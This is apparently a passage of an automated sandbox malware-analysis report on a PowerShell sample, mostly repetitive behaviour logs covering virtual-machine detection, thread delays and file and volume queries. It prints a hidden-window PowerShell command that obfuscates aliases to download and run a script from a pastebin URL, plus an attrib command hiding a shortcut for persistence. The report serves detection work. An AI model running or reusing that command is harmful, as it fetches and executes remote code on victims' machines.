Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4482Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5386Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1753Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4374Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5423Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 685Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 472Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4738
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5058
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 768Thread sleep time: -11990383647911201s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1988Thread sleep count: 1753 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5500Thread sleep count: 253 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7116Thread sleep count: 129 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6020Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2604Thread sleep count: 4374 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2604Thread sleep count: 5423 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5068Thread sleep time: -23980767295822402s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4984Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4400Thread sleep count: 685 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5588Thread sleep count: 178 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5720Thread sleep count: 472 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6148Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 760Thread sleep count: 4738 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3552Thread sleep count: 5058 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1408Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5036Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: powershell.exe, 00000000.00000002.2383690229.000001CA4EC3F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2559870408.0000029CF0090000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2640901795.000001493E88E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
